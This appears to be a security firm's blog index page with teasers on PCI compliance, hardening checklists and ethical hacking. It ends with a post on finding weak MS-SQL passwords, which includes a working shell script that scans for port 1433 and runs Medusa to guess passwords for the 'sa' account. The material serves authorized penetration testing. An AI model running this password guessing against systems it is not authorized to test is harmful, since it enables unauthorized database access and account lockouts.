Blog
Insights for Reasonable Cyber Security and Compliance
What’s happening in the world of cybersecurity? How do you define 'reasonable' security controls? Which cyber threats can be prevented? What steps should you take to make your systems safer? Read our blog posts to gain new insights into cybersecurity news, security awareness, the latest threats and risks, penetration testing, compliance, regulations and so much more.
PCI Council Releases New Guidance for Virtualization
The PCI Security Standards Council recently released new supplemental guidance (PDF) regarding PCI compliance considerations for the use of virtualization technologies.
Free Intro to PCI Training Available
In case you weren’t able to attend today’s webinar, Introduction to the Payment Card Industry Data Security Standard, we’ve posted a recording of the entire session on Halock’s YouTube channel.
The full 6-part series is embedded below for your convenience.
National Vulnerability Database (NVD) National Checklist Program Repository
While working with our clients to establish appropriate system hardening standards for PCI compliance, we are often asked to provide resources and guidance that can be referenced as additional system and operating system types are deployed. The following NIST resource, the National Checklist Program Repository hosted within the National Vulnerability Database (NVD), is most helpful in this regard.
Information Security Awareness Becoming More Mainstream?
This morning on CNN, about five minutes were spent talking about things like cloud security, the recent Sony and Lockheed Martin breaches, and the increased need to be aware of where our sensitive data is stored and how it is being protected.
Why We Need Ethical Hacking
There is often confusion about the difference between "vulnerability scanning" and "penetration testing", the latter being synonymous with "ethical hacking". A vulnerability scan is an automated check that reports conditions which may be exploitable; a penetration test goes further and has a skilled tester actually attempt to exploit those conditions, chain them together and demonstrate real impact. This article and podcast, from the president of EC-Council, the certifying body for the Certified Ethical Hacker (CEH) designation, includes a clear explanation of this very important kind of security testing.
PCI DSS Quick Reference Guide v2.0 Released
The PCI Security Standards Council has released the new PCI DSS Quick Reference Guide, updated for the new version 2.0 of the Payment Card Industry Data Security Standard (PCI DSS).
Visa to Launch Mobile Wallet in U.S. this Fall
Visa has announced plans to launch a mobile wallet using NFC ("Near Field Communication") to facilitate mobile payments. See the detailed announcement from Computerworld.
Scanning for Weak MS-SQL Passwords Using NMap and Medusa
Before proceeding, please note that there are many tools and methods that can scan for weak or blank MS-SQL passwords. SQLPing comes to mind, and it is a great tool if you're on a Windows host. Metasploit can scan for MS-SQL passwords as well, but it isn't ideal for targeted lists, and it can take time trying to connect to hosts that don't have SQL Server installed. I could probably write a few extra pages just about tools and methods, so I'll stop there and get started.
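As an added illustration of the Nmap-plus-Medusa approach named in this post's title (example commands written for this page, not the post's own script), the shell below first finds hosts that actually have TCP/1433 open and only then hands that list to Medusa's mssql module, which is what avoids the time wasted connecting to hosts with no SQL Server at all. The subnet, password file and the sample Nmap output are constructed for the example; only run this against systems you are authorized to test, and remember that a SQL Server login with a lockout policy enforced (CHECK_POLICY) can be locked out by a password-guessing run.

```shell
#!/bin/sh
# Added example, not from the original post. Assumes nmap and medusa are
# installed. The nmap output embedded below is constructed, not a real scan.

# Read Nmap "grepable" (-oG) output on stdin and print only the hosts whose
# 1433/tcp is reported open. Closed and filtered ports are dropped, so Medusa
# never spends time on hosts that are not listening for SQL Server at all.
mssql_hosts() {
    awk '/Ports:/ && /1433\/open\/tcp/ { print $2 }'
}

# Full procedure: scan the range for 1433/tcp, filter to live listeners, then
# run Medusa's mssql module against each one with a candidate password list.
#   subnet   : e.g. 10.0.0.0/24 (hypothetical range)
#   passfile : one candidate password per line
scan_and_check() {
    subnet="$1"
    passfile="$2"
    nmap -Pn -p 1433 --open -oG - "$subnet" | mssql_hosts > mssql_targets.txt
    # -u sa    : the built-in administrative login most often left weak
    # -e ns    : additionally try a blank password and the username itself
    # -t 4     : modest parallelism; raise with care because of lockout policies
    medusa -H mssql_targets.txt -u sa -P "$passfile" -e ns -M mssql -t 4 -O medusa_mssql.log
}

# Constructed sample of nmap -oG output covering open, closed and filtered cases.
SAMPLE_NMAP_GREPABLE='# Nmap 7.94 scan initiated (constructed sample)
Host: 10.0.0.5 ()   Status: Up
Host: 10.0.0.5 ()   Ports: 1433/open/tcp//ms-sql-s///
Host: 10.0.0.6 ()   Ports: 1433/closed/tcp//ms-sql-s///
Host: 10.0.0.7 ()   Ports: 1433/filtered/tcp//ms-sql-s///
Host: 10.0.0.8 ()   Ports: 1433/open/tcp//ms-sql-s///
# Nmap done (constructed sample)'

# Target list derived from the sample above; this is the part that runs offline.
sample_targets() {
    printf '%s\n' "$SAMPLE_NMAP_GREPABLE" | mssql_hosts
}

sample_targets
```

Only the two hosts with 1433/tcp open (10.0.0.5 and 10.0.0.8) reach the target file; the closed and filtered hosts are skipped before Medusa is invoked.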